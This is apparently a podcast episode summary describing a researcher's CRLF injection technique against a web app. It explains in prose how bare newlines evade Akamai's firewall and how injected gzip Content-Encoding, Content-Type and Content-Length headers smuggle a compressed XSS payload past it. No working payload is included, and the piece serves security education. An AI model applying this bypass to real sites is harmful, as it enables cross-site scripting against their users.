Using CRLF Injection to Bypass a Web App Firewall

We discussed this vulnerability during Episode 191 on 27 February 2023

The vulnerability here isn’t too interesting, just a case of user-input being reflected into a header without sanitizing new-lines (CrLf injection). What is interesting is how they leverage this header injection primitive to bypass Akamai’s web application firewall.

First, Akamai would block any \r\n in the request URL so \n was used instead. Using just a newline does not conform to the HTTP spec and may not work in all cases but many HTTP processors as reasonably permissive in parsing. In just using \n they could still follow the typical technique of injecting a \n\n<XSS payload here> for their XSS payload.

In that approach they also need to contend with the Akamai WAF on the XSS payload. Rather than trying to come up with a payload that would bypass the WAF, the Praetorian researcher leveraged the header injection and injected a Content-Encoding: gzip. Allowing them to provide a compressed payload that would not be properly processed by the WAF but when reflected back as the body of the response would be decompressed by the browser.

They also had to inject Content-Type and Content-Length headers with appropriate values so the response would be treated as HTML, and any extra data send after the payload would be ignored.